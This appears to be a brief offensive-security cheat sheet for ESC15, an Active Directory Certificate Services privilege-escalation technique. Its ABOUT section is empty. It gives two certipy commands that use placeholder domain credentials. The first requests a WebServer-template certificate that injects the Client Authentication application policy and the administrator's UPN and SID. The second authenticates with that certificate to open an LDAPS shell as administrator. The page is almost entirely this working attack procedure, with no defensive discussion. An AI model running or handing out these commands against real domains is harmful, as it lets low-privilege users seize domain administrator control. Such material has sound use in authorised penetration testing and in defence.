ESC15
ABOUT
EXPLOITATION
Request a certificate, injecting "Client Authentication" Application Policy and target UPN.
certipy req -u 'netrunner@arasaka.local' -p 'P@ssword123' -dc-ip '13.13.13.13' -target 'CA.ARASAKA.LOCAL' -ca 'ARASAKA-CA' -template 'WebServer' -upn 'administrator@arasaka.local' -sid 'S-1-5-21-...-500' -application-policies 'Client Authentication'Use certificate to get a LDAPS shell
certipy auth -pfx 'administrator.pfx' -dc-ip '13.13.13.13' -ldap-shellRESOURCES
Last updated